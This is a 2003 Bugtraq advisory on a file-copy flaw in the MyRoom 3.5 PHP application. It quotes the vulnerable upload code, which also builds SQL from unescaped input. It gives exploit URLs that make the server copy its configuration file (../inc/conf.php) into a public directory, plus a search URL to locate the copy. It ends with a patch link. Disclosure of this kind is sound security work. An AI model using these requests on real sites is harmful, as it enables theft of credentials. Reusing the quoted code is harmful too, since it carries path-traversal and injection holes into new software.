Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

MyRoom (PHP)

From: "Frog Man" <leseulfrog () hotmail com>
Date: Sun, 19 Jan 2003 01:42:39 +0100
Informations :
°°°°°°°°°°°°°°
Website : http://www.plansbiz.net
Version : 3.5 GOLD
Problems : File copy/upload


PHP Code/Location :
°°°°°°°°°°°°°°°°°°°
room/save_item.php :
------------------------------------------------------------------------
if($name == "" OR $ref == ""){
echo "You are fogot enter your 'ITEM NAME' or 'ITEM REF NO' !";
echo "<br>";
echo "<a href='$main_file?show=additem'>Try Agains [ Click Here ]</a>";
exit;
}

if($photo!="none" AND $photo!="application/octet-stream"){

        //get type of file
        $filetype=$photo_type;

        //get lenght of image type
        $filelenght=strlen($filetype);

        //get part of file image to build image extension
        $pos=strpos($filetype,"/")+1;

        //build extension of image
        $fileextention=substr($filetype,$pos,$filelenght);

        if($fileextention=="pjpeg"){
        $fileextention="jpg";
        }


        $image=date("YmdHis");
        $image.=".".$fileextention;
        $imgpath = "$imgroot";

        //if image exist, upload it in correct dir
        if($photov<>"none") {
          if(!copy($photo,"$imgpath/$image")) {
                //display errors
$msg="<br><font color='text00'>File Not Uploaded, it might be too large or does not exist..<br>Please Try Again!</font>"; 
                break;
          }
        //or finish
          else {
                dbconnect();
$sql= "INSERT INTO room_item SET it_photo='$image', it_name='$name', it_decs='$decs', it_ab='$album', it_ref='$ref'"; 
                mysql_query($sql) or die(mysql_error());
echo "<meta http-equiv='refresh' content='0;URL= $main_file?show=additem&m=1&i=$name'>"; echo "<br>Your File Was Uploaded Sucessful!! <br><br><a href='$main_file?show=additem&m=1&i=$name'>Loading ......</a>"; 
          }
        }

------------------------------------------------------------------------


Exploits :
°°°°°°°°°°
http://[target]/room/save_item.php?name=[NAME]&ref=hacked&photo=../inc/conf.php&photo_type=ttxt

+ http://[target]/room/index.php?show=search&search=it_name&item=[NAME]
to find the url of the txt file in wich is conf.php.

Patch :
°°°°°°°
A patch can be found on http://www.phpsecure.info (english version available) . 


More Details :
°°°°°°°°°°°°°°
In French :
http://www.frog-man.org/tutos/MyRoom.txt

Translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FMyRoom.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flanguage_tools




frog-m@n




_________________________________________________________________
MSN Search, le moteur de recherche qui pense comme vous ! http://search.msn.fr/worldwide.asp
Previous By Date Next
Previous By Thread Next

Current thread: